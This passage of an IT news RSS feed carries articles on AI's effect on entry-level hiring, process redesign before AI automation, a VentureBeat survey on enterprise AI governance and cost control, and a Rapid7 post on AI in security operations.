<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In the wake of AI, the early-talent job market is in decline across all jobs and industries, with a 10% drop since 2021, <a href="https://www.sap.com/documents/2026/05/ccd1609f-507f-0010-bca6-c68f7e60039b.html" rel="nofollow">according to a recent report from SAP</a>. When isolated for the top 10 most common entry level job titles, including software engineer, customer support, and data analyst, job openings declined 35% from 2024 to 2025.</p>



<p>AI is already impacting entry-level and task-based roles, leaving the question of what will happen to the future talent pipeline of IT leadership.</p>



<p>“Our research suggests that organizations create a gap in their <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html?utm=hybrid_search">future leadership pipeline</a> if they continue reducing entry-level hiring without rethinking how early-career talent develops,” says Autumn Krauss, chief scientist for Future of Work Research Lab at SAP SuccessFactors. “Historically, people built business acumen, technical expertise, and leadership skills through the first few years of their careers. As AI becomes embedded in workflows, organizations need to be intentional about creating new ways for employees to build those skills.”</p>



<p>Companies have traditionally followed hierarchal processes that encourage employees to advance up the career ladder via promotions, with many taking a leadership path to IT director, CIO, or CTO. However, this process has always relied on workers starting with entry-level and routine work to create a natural first step for future leaders. But now, more companies are automating the work that entry-level and mid-level employees used to cut their teeth on, says Maruf Ahmed, CEO of IT staffing and consulting company Dexian.</p>



<p>For example, a junior engineer might start in QA and testing on the technical side, getting hands-on experience with how systems work. As they progress in their career, that knowledge continues to stack, creating future leaders who deeply understand the technology and the business.</p>



<p>“Maintaining a strong succession path starts with being honest about what AI removed from someone’s development, and then being intentional about replacing it,” says Ahmed. “Senior leaders need to spend more time actively teaching, and people need exposure to complex decisions earlier in their careers. Day-to-day work used to build that foundation on its own, and it doesn’t anymore.”</p>



<h2 class="wp-block-heading">Redesigning jobs for AI and leading in uncertainty</h2>



<p>As many have discovered, it’s not always easy to decipher quality AI outputs, especially as the technology has become renowned for <a href="https://www.cio.com/article/228199/the-12-biggest-issues-it-faces-today.html?utm=hybrid_search">hallucinating results</a>. Current and future IT leaders need the foundational knowledge to have confidence when evaluating AI outputs, especially if they’re expecting employees to use AI. The most valuable leaders are the ones comfortable making decisions with incomplete information, and who can make calls on the spot about automated processes, no matter what may arise.</p>



<p>“We often see AI doesn’t stay contained in one function for long,” Ahmed adds. “Once an organization automates in one area, there’s an expectation to extend that more broadly, and leaders who built their careers inside a specific function are suddenly being asked to weigh in on AI use in areas they’ve never directly managed.”</p>



<p>According to recent research from <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html" rel="nofollow">Deloitte</a>, 84% of companies haven’t done the work to redesign jobs around AI despite high expectations for automation, and 36% expect at least 10% of their jobs to be fully automated within a year, and 82% say within three years. Even with those results, fewer than half are making significant adjustments to talent strategies, with 53% saying they’re simply focusing on educating employees to raise AI fluency.</p>



<p>That leaves entry-level workers and those in task-aligned roles in somewhat unknown territory as automation replaces time-consuming tasks, and managers shift to overseeing human-AI teams. Deloitte points to a potential shift toward flatter structures, with more than half of businesses considering pod-based or non-hierarchal models, while 16% have already started to make a shift.</p>



<p>IT leaders will likely find themselves relying more on others in the company to make judgment calls around AI, opening communication and transparency as job roles evolve and structures begin to flatten. With AI adoption happening at a rapid pace, organizations need to evaluate how it’ll impact talent and leadership structures, and what the future of leadership will look like with automation.</p>



<h2 class="wp-block-heading">Investing in early talent to maintain a leadership pathway</h2>



<p>IT leaders need to avoid the trap of treating AI adoption as a technology rollout rather than a workforce development project, says Ahmed. Leaders will continue to invest heavily in new tools, services, hardware, and technology, and then expect employees to become self-taught on these platforms in their downtime.</p>



<p>“Our research found that leaders don’t often feel confident or equipped with the skills to lead that level of transformation. Instead, organizations often fall back on the tactic of giving employees AI tools and expecting them to figure out how best to use them on their own,” says Krauss.</p>



<p>If current IT leaders feel unequipped to lead through AI transformation, it’s imperative companies step back and reevaluate training and future leadership talent pools. Investments in AI should be weighed alongside the necessary investments for employee upskilling and training, and to redefine long-standing organizational structures.</p>



<p>Investment in early <a href="https://www.cio.com/article/251060/employee-retention-10-strategies-for-retaining-top-talent.html?utm=hybrid_search">talent development programs</a> can also be beneficial for tackling potential future leadership gaps left by AI adoption, with 86% of employees saying that an early talent program helped set them up for career success, according to the SAP report. But despite the beneficial nature of such programs, only 32% of early talent report participating in an early talent program, and 49% say their organization doesn’t offer one. Plus, only 35% of early talent employees say they’ve been given sufficient transparency into which roles in their organization may be automated in the future, while one in three express concerns their job may one day cease to exist due to AI advancements.</p>



<p>“As roles change, organizations need to give employees a clearer picture of where opportunities are emerging and what skills will be most important,” says Krauss. “Many employees are already uncertain about how technology will affect their careers, and that uncertainty can make it harder to stay engaged. People are more likely to invest in their growth when they see a path forward. That visibility is becoming increasingly important.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Is a ‘Frictionless’ Society a Trap?]]></title>
<description><![CDATA[Eliminating whatever stands between you and a task sounds nice, but it probably has more to offer companies than users.]]></description>
<link>https://tsecurity.de/de/3640640/it-nachrichten/is-a-frictionless-society-a-trap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640640/it-nachrichten/is-a-frictionless-society-a-trap/</guid>
<pubDate>Thu, 02 Jul 2026 11:18:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eliminating whatever stands between you and a task sounds nice, but it probably has more to offer companies than users.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI savings are an illusion without process re-engineering]]></title>
<description><![CDATA[The PC was heralded as revolutionary; it was going to save time, revolutionize our work… But it became an opportunity lost. Paper became digital files. Filing cabinets became shared drives. Memos became email. We sometimes worked faster. We did not necessarily work differently. And we certainly d...]]></description>
<link>https://tsecurity.de/de/3640590/it-nachrichten/why-ai-savings-are-an-illusion-without-process-re-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640590/it-nachrichten/why-ai-savings-are-an-illusion-without-process-re-engineering/</guid>
<pubDate>Thu, 02 Jul 2026 11:03:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The PC was heralded as revolutionary; it was going to save time, revolutionize our work… But it became an opportunity lost. Paper became digital files. Filing cabinets became shared drives. Memos became email. We sometimes worked faster. We did not necessarily work differently. And we certainly did not work more efficiently. The underlying logic: approval chains, reporting cycles, hierarchies and incentives remained intact.</p>



<p>The internet and smartphones followed the same pattern, compressing time and distance. But neither forced enterprise changes. The tools changed. The organizational model did not. This stagnation is referred to as the Solow Productivity Paradox, a historic mismatch between massive technology investments and flat corporate productivity. And while the Internet boom did see a raise in productivity, it was due to investment in hardware, not so much due to a change in how we worked, as explained by <a href="https://www.cio.com/article/266741/it-organization-the-new-economy-what-productivity-miracle.html">Robert Gordon in The New Economy: What Productivity Miracle?</a></p>



<p>And now there’s Artificial Intelligence, AI. AI presents a different kind of challenge because it intervenes in cognition itself. It reaches much closer to the operating logic of the enterprise than previous technology waves.</p>



<p>Yet, once again, the response is surface adaptation rather than structural reinvention. AI is layered onto inherited workflows, old approval thresholds, unclear accountability structures and sprawling software, then expecting cost savings to follow. And again, it is the investments in AI that garner any growth, not changes in corporate infrastructure.</p>



<p>This is not transformation. It is acceleration without reform. And this “slap on AI” will have as much long-term impact as the PC.</p>



<h2 class="wp-block-heading">Automation = efficiency? Wrong</h2>



<p><a href="https://www.cio.com/article/4151188/ways-cios-can-prove-to-boards-that-ai-projects-will-deliver.html.">Chief information officers</a> are under intense pressure to turn AI into measurable financial outcomes. In boardrooms, expectations are explicit: deploy AI, automate, reduce operating cost and show results within a budget cycle.</p>



<p>A central misunderstanding in AI programs is the assumption that if a process is costly and labour-intensive, automation creates efficiency. Unfortunately, what appears as inefficiencies are normalized fragmentations. With AI, hidden workflow contradictions become both significant and visible. Organizations discover it wasn’t running a slow but clean process. It was running an incoherent process that relied on human buffering to keep it functioning. This is precisely why so many AI efforts disappoint immediately after a dazzling pilot, degenerate into <a href="https://www.cio.com/article/4158000/ai-strategy-theater-why-cios-are-performing-innovation-instead-of-leading-it.html.">AI strategy theatre</a> and fail to scale.</p>



<p>When one part of the workflow becomes lightning-fast, but the surrounding process remains fractured, escalations multiply and the IT department, despite having done its job perfectly, is asked to fix the operational fallout with more tooling, more integration, more controls and more spend. The problem is rarely technical. But it becomes so very quickly.</p>



<p>I increasingly think the more useful concept here is <em>process debt</em>. CIOs are already comfortable talking about <a href="https://www.cio.com/www.cio.com/article/3958666/what-is-technical-debt-a-business-risk-it-must-manage.html">technical debt</a> and its complexities. <em>Process</em> <em>debt</em> is the upstream generator of that complexity. It accumulates when temporary fixes become permanent, when controls are added without removing older ones and when incidents leave behind workflows nobody dares to challenge. Over time, the process stops reflecting deliberate design and starts reflecting institutional memory, risk aversion and unresolved negotiations between functions.</p>



<h2 class="wp-block-heading">Case study 1: The regulated approval-heavy process</h2>



<p>I was brought into a regulated organization that wanted to identify opportunities for automation. The assumption was that technology was the main constraint. Workflows involved multiple reviews, approvals and handovers between departments. From a distance, it looked like an obvious candidate for automation.</p>



<p>It was a familiar situation: delays, duplicated effort and frustration with how long routine work was taking to complete. The process seemed overstaffed and underdesigned. The natural conclusion was that automation could remove unnecessary tasks and improve speed.</p>



<p>But as I began interviewing the stakeholders, a different picture emerged. Every group could explain its role in the workflow. But the more I listened, the clearer it became that nobody could describe the process as a coherent whole.</p>



<p>What appeared to be an inefficient process was a process that had accumulated layers of governance without ever being reassembled into a consistent operating model. One approval had been added after an audit finding. Another had been introduced during a restructuring. A third existed because of a past incident. None of those approvals looked unreasonable in isolation. Together, they produced a workflow that nobody owned and with approval layers nobody could justify.</p>



<p>From the CIO’s perspective, this translated into technology sprawl. Unaligned and multiple IT systems were being used to support adjacent parts of the workflow. Software had been purchased to manage steps that shouldn’t have existed in the first place. This meant the entire nature of the automation discussion shifted. The strategic question was no longer which step should be automated first. It was whether those steps deserved to exist at all.</p>



<p>Only after the CIO and I brought the business units together to confront these structural dependencies did the process align and technology become part of the answer. Without that preliminary work, automation would simply have moved a poorly understood process faster while expanding the expensive software estate needed to govern it.</p>



<p>That engagement reinforced my conviction that many workflows presented as automation candidates are not ready for automation because they are not sufficiently coherent to automate.</p>



<h2 class="wp-block-heading">Uncomfortable questions</h2>



<p>Because these questions are operationally and politically sensitive, businesses will try to avoid them and hand the unmapped mess directly to IT. As a strategic partner, the CIO must guide the C-suite through these uncomfortable but necessary inquiries before deploying AI into enterprise workflows:</p>



<ul class="wp-block-list">
<li>Does this process need to exist at all?</li>



<li>Where are decisions actually made in day-to-day practice? Not according to policy documentation, but according to the informal networks of people who actually know how to navigate the exceptions.</li>



<li>Which parts of the workflow exist because of corporate history rather than necessity?</li>



<li>Where do decision rights shift between teams without anyone acknowledging it?</li>
</ul>



<p>AI systems do not handle ambiguities gracefully. Answering these questions upfront determines whether implementing AI will mean genuine savings or simply move organizational incoherence through the enterprise at lightning speed.</p>



<h2 class="wp-block-heading">Three-layer governance</h2>



<p>Governance is the ultimate reason why AI cannot be treated as a traditional technology delivery program with a bit of business input tacked on at the end. Because AI fundamentally alters how enterprise decisions are informed and executed, its deployment must be shaped by an integrated operating and governance framework.</p>



<p>CIOs can evaluate an organization’s true AI readiness based on three interdependent governance layers. By mastering these, the technology stack is protected from being forced to compensate for bad business design.</p>



<ol class="wp-block-list">
<li><strong>Organizational governance. </strong><em>Core questions:</em> Is this workflow genuinely needed, who actually owns it and what risk or quality definitions are binding across separate business functions? This is a cross-departmental leadership question. It must be resolved by the business units first, or IT inevitably inherits the resulting operational complexity.</li>



<li><strong>Endpoint or tool governance. </strong><em>Core questions</em>: How are outputs interpreted when cognitive work is partially or fully delegated to machines? This layer defines exactly where a human-in-the-loop remains mandatory, how exceptions are escalated to specialists and how accountability is maintained when an AI agent makes an optimized operational prediction.</li>



<li><strong>Platform governance. </strong><em>Core questions:</em> What is the foundational security, privacy and technical guardrails? This includes LLM/model selection, vendor standards, data privacy compliance, integration rules and continuous monitoring. Paradoxically, this is the layer most organizations focus on first—yet, because it exists entirely to support the processes and tools above it, it should actually be the last to be set in stone.</li>
</ol>



<p>These layers interlinked. A weakness in one undermines the others. This is where CIOs become strategically important. They are the executives who see when process incoherence is converted into architectural complexity, application sprawl, higher license costs and long-term support burdens. AI decisions without that perspective and organizations will once again confuse digitization with transformation.</p>



<h2 class="wp-block-heading">Case Study 2: A downstream bottleneck and the structural solution</h2>



<p>In another engagement, the business pushed for an AI-driven intake solution. Frontline teams were spending massive amounts of time on repetitive customer data coordination and document verification. On paper, it was an outright victory: IT delivered an AI agent that dropped data extraction times by 85% with an exceptional accuracy rate. In every sense of the word – the pilot was a triumph. And it was phased to implementation.</p>



<p>Within six weeks, the illusion shattered. While the intake layer was now running at lightning speed, the downstream validation process still relied on traditional compliance handoffs, manual fraud checks and legacy database updates. The AI didn’t solve the operational problem; it simply shoved massive volumes of data into a rigid pipeline that was never designed for that velocity.</p>



<p>Escalation queues exploded. The operations team, buried under an unprecedented backlog, began making manual bypass decisions just to keep up, creating immense operational risk.</p>



<p>Rather than allowing IT to be blamed for the downstream chaos, the CIO and I suggested a structural solution. First, we halted further automated intake scaling and used visual process-mapping data to show the rest of the C-suite exactly where the digital pipeline was hitting an analogue wall.</p>



<p>Second, we championed a cross-functional “value stream” redesign. After much negotiation, we managed to leverage the AI’s data-validation outputs to eliminate three manual review steps downstream and replace them with exception-only automated alerts. Finally, we renegotiated the risk-threshold parameters with the legal and compliance teams, shifting accountability from a multi-stage sign-off to a centralized, systemic audit log.</p>



<p>The solution wasn’t adding more software; it was picking the process apart, data point by data point, to align the business rules with machine capabilities. The result was a substantially trimmer, automated end-to-end stream that freed up human resources, allowed redundant software licenses to be safely withdrawn and actually realized the promised financial savings.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>Every CIO knows that AI matters. The real challenge facing enterprises whether the executive leadership team is willing to confront what AI inevitably reveals about the fragmented processes, legacy habits and siloed systems organizations have been carrying for decades.</p>



<p>This is why the broad promise of immediate AI savings is overstated. Automation can produce staggering enterprise value, but it cannot create structural coherence on its own. If a workflow is fractured, historically layered and dependent on invisible human intervention, adding AI will not turn it into an efficient system. It will simply scale, cement and automate the weaknesses that were already there.</p>



<p>The CIO’s ultimate responsibility is to ensure that technically incoherent processes do not get permanent residency in the business architecture. This is why the CIO must have a leading seat at the strategic table. Incoherent processes invariably turn into application sprawl, redundant tooling, excess licensing costs, integration debt and massive security exposure.</p>



<p>To avoid this trap, enterprise AI deployment requires cross-departmental leadership willing to examine which work should be automated, which must be completely redesigned and which should be eliminated. </p>



<p>If not, we will simply repeat the costly errors of past technology shifts: preserve the outdated operating logic, throw a shiny new layer of tooling on top and call the expensive result “transformation.” This time, the bill will be significantly larger. Not because AI is mysterious, but because it is brutally efficient at exposing the waste that organizations used to hide inside their people, their processes and their software.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Control Gap: Enterprise AI organizations have an ownership problem, not a technology problem — and most are governing it by hand]]></title>
<description><![CDATA[AI portfolios are expanding far faster than the ability to govern them across enterprises. Most organizations run a contested field of platforms, each claiming to be the “primary” AI layer; few could confidently detect a model drifting or failing in production; and the single most-cited barrier t...]]></description>
<link>https://tsecurity.de/de/3639533/it-nachrichten/the-control-gap-enterprise-ai-organizations-have-an-ownership-problem-not-a-technology-problem-and-most-are-governing-it-by-hand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639533/it-nachrichten/the-control-gap-enterprise-ai-organizations-have-an-ownership-problem-not-a-technology-problem-and-most-are-governing-it-by-hand/</guid>
<pubDate>Wed, 01 Jul 2026 21:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI portfolios are expanding far faster than the ability to govern them across enterprises. Most organizations run a contested field of platforms, each claiming to be the “primary” AI layer; few could confidently detect a model drifting or failing in production; and the single most-cited barrier to control is the absence of any one owner accountable for AI across the stack. The result is a widening control gap — ambition and spend racing ahead of visibility, ownership, and cost control — with autonomous agents already producing real financial and operational failures.</p><p>This wave of VentureBeat Pulse Research examines the enterprise AI control gap: how many platforms claim to be the primary AI layer, who actually governs AI behavior across them, whether organizations could detect a model failing in production, what most blocks cross-platform governance, and how the financial and operational control failures of autonomous agents are already surfacing.</p><p>The central finding is a control gap — the distance between how aggressively enterprises are expanding AI and how little of it they can see, own, or govern. Just under three-fifths (58%) are net-adding AI initiatives, with “expanding significantly” the largest single posture.</p><p>Yet 85% run two or more platforms each claiming to be the “primary” AI layer and only 8% have consolidated to one. Against that contested surface, 40% say they are very confident they would detect a model drifting, behaving unsafely, or failing in production — but only 10% back that confidence with active monitoring and alerting, the rest leaning on manual human review. The machinery to expand AI is running well ahead of the machinery to control it.</p><p>The gap is, above all, a question of ownership. Only a third (38%) say a central team governs AI today, and a fifth (20%) say each platform team governs its own independently; the single most-cited barrier to cross-platform governance is the absence of a single accountable owner (32%), and roughly one in six (17%) say no role holds formal accountability at all. The same vacuum shows up in spend: just under half (49%) name shadow AI — unauthorized agentic pipelines run on corporate cards outside central oversight — as their most severe control failure, and another 25% have been hit by a runaway “infinite loop” agent bill. Enterprises have standardized the ambition well before they have standardized the control.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on the enterprise AI control gap — governance, observability, and cost control across multiple AI platforms. Responses are filtered to organizations with 100 or more employees and, for this cut, exclude the respondents who selected “Other” as their job function, leaving a base of identifiable roles (n=145); all are drawn from a single Q2 2026 (June) wave. </p><p>By organization size the sample tilts toward the mid-market and lower-large bands: 100–499 and 500–2,499 employees (23% each) lead, with 10,000–49,999 (22%) and 2,500–9,999 (20%) close behind and 50,000+ at 11%. By role it is senior and technical: consultants and advisors (20%), CIO/CTO/CISO (18%), directors of engineering/IT (14%), product and program managers (13%), and enterprise architects (12%) make up the core. Technology/Software is the largest industry at 41%, followed by Financial Services and Professional Services (12% each) and Healthcare/Life Sciences and Manufacturing/Industrial (10% each).</p><p>The findings should be read as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. Where a single share would be fragile on its own, the report leans on the direction and grouping of responses rather than the exact percentage point.</p><h2>Finding 1: Expansion is outrunning control</h2><p><b>AI portfolios are growing faster than the means to govern them</b></p><p>We asked enterprises to describe how their AI portfolio has changed over the past 12 months. Growth leads — with a meaningful minority deliberately pulling back.</p><div></div><p>Expansion leads. Combining “expanding significantly” (33%) and “net positive growth” (25%), just under three-fifths of enterprises (58%) are net-adding AI initiatives. Yet a substantial share is easing off deliberately: roughly a quarter (23%) are actively rationalizing — scaling what works and cutting the rest — and another 12% hold their portfolios flat. Only a handful (3%) have paused to get governance in order first. </p><p>This is the engine behind every gap that follows: enterprises are accelerating into a landscape they have not yet learned to see or own, and a notable 4% cannot even describe their own portfolio. The ambition documented here is exactly what makes the visibility and ownership shortfalls in Findings 3 and 4 consequential rather than academic.</p><h2>Finding 2: No single “primary” AI layer — the surface is contested</h2><p><b>More than four in five run multiple platforms each claiming primacy</b></p><p>We asked how many enterprise platforms currently claim to be the organization’s “primary” AI layer — the ERP, EHR, ITSM, productivity suite, or data platform each positioning itself as the center of gravity. Almost no one has a single answer.</p><div></div><p>The defining condition is contested primacy. Adding the two multi-platform bands, 85% of enterprises have at least two platforms each asserting itself as the primary AI layer, and more than a third (36%) describe an open four-way-or-more contest. Only 8% have consolidated to a single layer, and another 6% have not even mapped the question. This is the structural reason governance is hard: there is no agreed center of gravity to govern from. Each platform brings its own AI, its own controls, and its own assumptions — and, as Finding 3 shows, the question of who governs across them increasingly has no settled answer.</p><h2>Finding 3: Governance is claimed at the center but contested in practice</h2><p><b>A central team owns it on paper; in practice, it's fragmenting</b></p><p>We asked who is actually responsible for governing AI behavior across all of those platforms today, and which function holds primary accountability. The headline answer is reassuring; the detail is not.</p><div></div><p>On the surface, a central governance function is the leading answer — but only a third (38%) claim one, well short of a majority. The rest of the distribution undercuts it further: a fifth (21%) say ownership is unclear or contested between teams, a fifth (20%) say each platform team simply governs its own AI independently, and 19% say no one has addressed it at all. </p><p>Accountability fragments further when we asked which role actually holds it — CIO/CTO/CISO leads at 27%, a Chief AI Officer or equivalent at 22%, and a striking 17% say no one holds formal accountability yet. Even where a central team is claimed, the named owner is most often the general technology executive rather than a dedicated AI authority. The governance function exists more often as an org-chart aspiration than an operating reality — the precondition for the detection gap in Finding 4.</p><h2>Finding 4: The detection gap — confidence is real but largely manual</h2><p><b>Only one in 10 have active monitoring and alerting</b></p><p>We asked how confident enterprises are that they would detect an AI model in production that was drifting, behaving unsafely, or failing to complete tasks correctly. This is the heart of the control gap.</p><div></div><p>This is the report’s central number. While 40% say they are very confident they would detect a failing model, the overwhelming majority of that confidence rests on manual human review (30%) rather than automation — just 10% have active monitoring and alerting actually in place. </p><p>At the other end, more than a quarter combine the two reactive answers — no systematic visibility (8%) and would hear it from end users first (19%) — meaning they would learn of a production failure after the fact, from the people it affected. The plurality (32%) sit in a hopeful middle, expecting to “catch most issues eventually.” Set against the aggressive expansion of Finding 1, this is the crux of the control gap — enterprises are scaling AI into production faster than they are building automated means to know when it breaks. Confidence is real, but it is largely manual, and automated detection remains the exception.</p><h2>Finding 5: The missing owner is the biggest barrier</h2><p><b>Governance stalls on accountability first, visibility second</b></p><p>We asked enterprises to name their single biggest barrier to governing AI across multiple platforms. The org chart tops the list.</p><div></div><p>The single missing owner leads at 32%, the most-cited barrier. Vendor opacity (25%) and the lack of tooling or infrastructure to observe across platforms (16%) sit behind, and together these two technical-visibility barriers (41%) outweigh the ownership gap. Leadership deprioritization accounts for another 17%, while a clear lack of talent is rare (5%). Rounding out the picture, another 5% say it isn't a barrier for them at all — they've already solved it. </p><p>Read together, the picture is more contested than the headline suggests: enterprises still most often name a missing owner, but a good share locate the obstacle in vendor black boxes and the absence of cross-platform observability. </p><p>Asked in a free-text question what one thing they would fix, respondents converged from different directions on the same answer — a single accountable owner, and a control plane that abstracts cost, drift, and model choice away from the end user.</p><h2>Finding 6: The fine-tuning ROI reckoning</h2><p><b>Roughly seven in 10 have little to show for custom model investment</b></p><p>We asked what share of the proprietary foundation models enterprises have invested in fine-tuning over the past 18 months have delivered clear, measurable positive ROI in production today. Most describe a sandbox graveyard — or a deliberate decision to avoid one.</p><div></div><p>Custom fine-tuning has, for most, not paid off. Combining the three disappointing outcomes — sandbox graveyard, strategic avoidance, and total write-off — roughly seven in ten (73%) either failed to get custom models into productive use or deliberately declined to try, against 27% for whom fine-tuned models are a reliable advantage. The largest single group (45%) remains the graveyard: projects too expensive or complex to maintain, stranded in development. Another quarter (24%) never started — they priced in the downstream maintenance burden and avoided it. </p><p>The signal is that many enterprises still treat bespoke model training as a cost trap, which helps explain the pragmatic, buy-and-blend vendor posture in Finding 7.</p><h2>Finding 7: Vendor posture — hybrid by default, with defection rising</h2><p><b>Enterprises blend open and closed models; more are now trimming a vendor</b></p><p>We asked two related questions: whether enterprises are shifting workloads toward open-weight models to escape API costs and lock-in, and which proprietary vendor, if any, they are most likely to phase out over the next year. The answers describe hedging — and a rising willingness to cut.</p><div></div><p>On open weights, a clear majority (51%) strike a hybrid balance, with a deliberate closed commitment second at 32% and a hard pivot to self-hosted open models at 16%. The hybrid plurality is the same instinct visible throughout this survey — keep optionality, avoid being trapped — while the closed group remains candid that the operational overhead of self-hosting still outweighs the savings for them. </p><p>On vendor defection, loyalty by inertia no longer leads: Microsoft is now the single most-named target (29%, often citing Copilot/Azure cutbacks in favor of direct model access), narrowly ahead of the 27% who are downsizing no one at all. OpenAI follows at 21% (citing pricing volatility), with Anthropic at 15% and Google at 6%. No single vendor faces a wholesale exodus, but among identifiable roles the balance has tipped from “expanding across all” toward actively trimming at least one provider.</p><h2>Finding 8: The agentic spending crisis — shadow AI leads the failures</h2><p><b>Unauthorized pipelines, not runaway loops, are the top control failure</b></p><p>Finally, we asked what the most severe financial or operational control failure enterprises have experienced as autonomous agents run over longer execution windows. Shadow AI tops the list — and very few have escaped a scare.</p><div></div><p>The control gap has a price, and it is being paid. Just under half of enterprises (49%) cite shadow AI — unauthorized agentic pipelines spun up on corporate cards outside any central oversight — as their most severe failure, the operational twin of the “no single owner” barrier in Finding 5. Another 25% have been burned by a runaway infinite-loop agent bill, and 6% by an agent that degraded production databases. Only 21% report guarded stability — the minority that has imposed hard token throttling and budget caps at the infrastructure layer and avoided surprises. </p><p>Put differently, roughly four in five of these enterprises (79%) have already experienced a real financial or operational control failure from autonomous AI, not merely worried about one. As with detection in Finding 4, the deterministic controls that would prevent these failures exist at only a fraction of organizations.</p><h2>The bottom line: A control gap that spending cannot close on its own</h2><p>Organizations with 100 or more employees describe AI programs that are expanding fast and governing slowly. Just under three-fifths are net-adding to their portfolios; more than four in five run a contested field of platforms with no agreed primary layer; and the thing they most often name as their chief obstacle is a single accountable owner. The visibility to match the ambition is largely manual — only 10% have active monitoring and alerting, and confidence in detecting a failing model rests mostly on human review rather than automation.</p><p>The consequences are already concrete rather than hypothetical. Custom fine-tuning has disappointed more often than not, pushing enterprises toward a hedged, hybrid, buy-and-blend model posture; and the autonomous agents now reaching production have produced real control failures for roughly four in five respondents, led by shadow AI running outside any central oversight. This reads as a directional signal rather than a precise measurement — but the direction is consistent across every question: ambition, spend, and deployment are racing ahead of ownership, observability, and cost control. The control gap is not a tooling problem that more spending will close on its own; it is, first, a question of who owns the answer. </p><hr><p><i>Based on survey responses from 145 qualified enterprise respondents (100+ employees). Sample size is small; data should be treated as directional. Respondents include Directors, VPs, CIOs, CTOs, and Enterprise Architects across Technology, Financial Services, Retail, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Myths About AI in the SOC Security Teams Need to Rethink]]></title>
<description><![CDATA[AI is now part of almost every conversation in security operations. Most teams are already investing in it, experimenting with it, or trying to understand where it fits. The challenge is not whether to adopt AI, but how to apply it in a way that actually improves outcomes.At the Rapid7 Global Cyb...]]></description>
<link>https://tsecurity.de/de/3639078/it-security-nachrichten/5-myths-about-ai-in-the-soc-security-teams-need-to-rethink/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639078/it-security-nachrichten/5-myths-about-ai-in-the-soc-security-teams-need-to-rethink/</guid>
<pubDate>Wed, 01 Jul 2026 18:10:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>AI is now part of almost every conversation in security operations. Most teams are already investing in it, experimenting with it, or trying to understand where it fits. The challenge is not whether to adopt AI, but how to apply it in a way that actually improves outcomes.</span></p><p><span>At the Rapid7 Global Cybersecurity Summit, the session</span><a href="https://www.brighttalk.com/webcast/10457/662820?utm_source=blog&amp;utm_medium=website&amp;utm_content=blog-4-post-summit&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng" target="_blank"><span><em> The AI Dilemma: Automating Defense Without Surrendering Judgment</em></span></a><span> explores how AI is being used in the SOC today, and where it creates real value in practice.</span></p><p><span>The discussion centers on a set of assumptions that often shape how teams approach AI, and why those assumptions do not always hold up in real environments.</span></p><h2>Myth 1: AI will replace analysts</h2><p><span>Across the session, there is a consistent focus on how AI supports investigation workflows by reducing repetitive work and surfacing relevant context, allowing analysts to focus on decisions that require judgment. AI helps teams move faster, but responsibility and accountability still sit with people. TL;DR, the role of the analyst is evolving, but it is not disappearing.</span></p><h2>Myth 2: More automation means better security outcomes</h2><p><span>Automation is valuable when it is applied in the right places. In practice, teams are finding the most benefit in areas such as enrichment, summarization, and triage, where large volumes of data need to be processed quickly. High-impact actions such as containment or configuration changes still require oversight, particularly when they can affect production systems or business operations.</span></p><h2>Myth 3: Speed is more important than transparency</h2><p><span>As adoption increases, trust becomes more important and analysts need to understand how a conclusion was reached before they act on it, especially in high-pressure situations. The session highlights how explainability builds confidence over time, allowing teams to rely on AI outputs without losing control of the decision-making process.</span></p><h2>Myth 4: AI is only about efficiency gains</h2><p><span>Efficiency is part of the story, but the impact runs deeper. AI helps connect signals across fragmented environments, reduces cognitive load, and supports more consistent decision-making. It also changes how teams approach investigation by making it easier to surface patterns and identify relationships that would be difficult to see manually.</span></p><h2>Myth 5: Attackers benefit more from AI than defenders</h2><p><span>Both attackers and defenders are learning how to use AI, and both are moving quickly. What matters for security teams is how they apply it within their own workflows. The session explores how AI strengthens detection, investigation, and response when it is integrated into existing processes rather than treated as a standalone capability.</span></p><h2>Where AI creates real value in the SOC</h2><p><span>Across the discussion, a clear pattern emerges. AI delivers the most value when it is applied to high-volume, context-heavy tasks, where it can process data, highlight signals, and recommend next steps. Analysts remain central to interpreting those signals, understanding intent, and deciding how to respond.</span></p><p><span>This balance between automation and oversight is what allows teams to scale their operations without losing confidence in their decisions. It also reflects how AI is being adopted across the industry, with most organizations maintaining moderate to high levels of human involvement as they build trust in these systems.</span></p><p><span>For SOC leaders, practitioners, and teams exploring AI, the session offers a grounded view of how these technologies are being applied today, and how that approach is continuing to evolve.</span></p><p><a 